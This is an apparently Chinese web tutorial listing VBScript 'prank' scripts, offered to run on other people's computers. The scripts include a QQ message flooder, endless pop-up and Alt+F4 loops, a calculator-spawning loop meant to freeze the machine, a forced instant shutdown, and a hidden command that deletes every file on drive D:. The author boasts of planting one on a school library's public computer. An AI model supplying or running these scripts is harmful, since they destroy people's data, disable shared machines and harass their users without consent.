一、你打开好友的聊天对话框,然后记下在你QQ里好友的昵称,把下面代码里的xx替换一下,就可以自定义发送QQ信息到好友的次数(代码里的数字10改一下即可). 
xx.vbs=> 
复制代码 代码如下:
On Error Resume Next 
Dim wsh,ye 
set wsh=createobject("wscript.shell") 
for i=1 to 10 
wscript.sleep 700 
wsh.AppActivate("与 xx 聊天中") 
wsh.sendKeys "^v" 
wsh.sendKeys i
wsh.sendKeys "%s" 
next 
wscript.quit 

二、我就用这个程序放在学校图书馆查询书刊的机器上，好多人都那它没办法，哈哈 
do 
msgbox "You are foolish!" 
loop 

三、打开无数个计算器，直到死机
set wsh=createobject("wscript.shell") 
do 
wsh.run "calc" 
loop 

四、直接关机 
dim WSHshell 
set WSHshell = wscript.createobject("wscript.shell") 
WSHshell.run "shutdown -f -s -t 00",0 ,true 

五、删除D:\所有文件 
dim WSHshell 
set WSHshell = wscript.createobject("wscript.shell") 
WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true 

六、不断弹出窗口 
复制代码 代码如下:
while(1) 
msgbox "哈哈 你被耍了！" 
loop 

七、不断按下alt+f4 （开什么都关闭……）
复制代码 代码如下:
dim WSHshell 
set WSHshell = wscript.createobject("wscript.shell") 
while(1) 
WSHshell.SendKeys "%{F4}" 
loop 

八、按500次回车 
(以上代码在运行者的电脑上显示500个对话框。其中 do until s=500 ，500可以随意更改) 
复制代码 代码如下:
dim s 
do until s=500 
s=s+1 
msgbox "哥们，给我按500次回车吧",64 
loop 

九、关不掉的窗口 
复制代码 代码如下:
WScript.Echo("嘿，谢谢你打开我哦，我等你很久拉！"&TSName) 
WScript.Echo("你是可爱的小朋吗?") 
WScript.Echo("哈,我想你拉，这你都不知道吗？") 
WScript.Echo("怎么才来，说~是不是不关心我") 
WScript.Echo("哼,我生气拉，等你这么久，心都凉啦。") 
WScript.Echo("小强很生气，后果很严重哦。") 
WScript.Echo("嘿嘿！你也会很惨滴哦") 
WScript.Echo("是不是想清除我？") 
WScript.Echo("那你要点上50下哦，不过会给你惊喜滴") 
WScript.Echo("还剩49下，快点点哦") 
WScript.Echo("还剩48下，快点，小笨蛋！") 
WScript.Echo("还剩47下对，就这样快点点！") 
WScript.Echo("还剩46下。你啊就是笨，要快哦，我先不打扰你工作。") 
WScript.Echo("还剩45下，记得要快哦！") 
WScript.Echo("还剩43下") 
WScript.Echo("还剩42下") 
WScript.Echo("还剩41下") 
WScript.Echo("还剩40下") 
WScript.Echo("还剩39下") 
WScript.Echo("还剩38下") 
WScript.Echo("还剩37下") 
WScript.Echo("还剩36下") 
WScript.Echo("还剩35下") 
WScript.Echo("还剩34下") 
WScript.Echo("还剩33下") 
WScript.Echo("还剩32下") 
WScript.Echo("还剩30下") 
WScript.Echo("还剩29下") 
WScript.Echo("还剩28下") 
WScript.Echo("还剩27下") 
WScript.Echo("还剩26下") 
WScript.Echo("还剩25下") 
WScript.Echo("还剩24下") 
WScript.Echo("还剩23下") 
WScript.Echo("还剩22下") 
WScript.Echo("还剩21下") 
WScript.Echo("还剩20下") 
WScript.Echo("还剩19下") 
WScript.Echo("还剩18下") 
WScript.Echo("还剩17下") 
WScript.Echo("还剩16下") 
WScript.Echo("还剩15下") 
WScript.Echo("还剩14下") 
WScript.Echo("还剩13下停停！！！慢点，我有话要说") 
WScript.Echo("还剩12下，你继续点我就会消失滴") 
WScript.Echo("还剩11下，以后就看不到我拉。555555") 
WScript.Echo("还剩10下，你现在可以选择停止！") 
WScript.Echo("还剩9下。你还点啊，不要我拉？") 
WScript.Echo("还剩8下，有点伤心拉，干嘛丢弃人家") 
WScript.Echo("还剩7下。疯了，你有点负意！") 
WScript.Echo("还剩6下。对。你就点吧，我恨你！") 
WScript.Echo("还剩5下，不明白，删除我你就好吗？") 
WScript.Echo("还剩4下！真要删除我？") 
WScript.Echo("还剩3下。可是我真的很眷恋你。。。") 
WScript.Echo("还剩2下。不要这么绝情嘛，人家是爱你的！") 
WScript.Echo("还剩1下。哼，既然你这么绝情。也别怪我无义！！！") 
WScript.Echo("我本因该消失的，不过我留恋你滴芳容，上帝又给了一次机会。") 
WScript.Echo("想结素我么?那你就再多点一次") 
WScript.Echo("想结素我么?那你就再多点一次") 
WScript.Echo("想结素我么?那你就再多点一次") 
WScript.Echo("想结素我么?那你就再多点一次") 
WScript.Echo("想结素我么?那你就再多点一次") 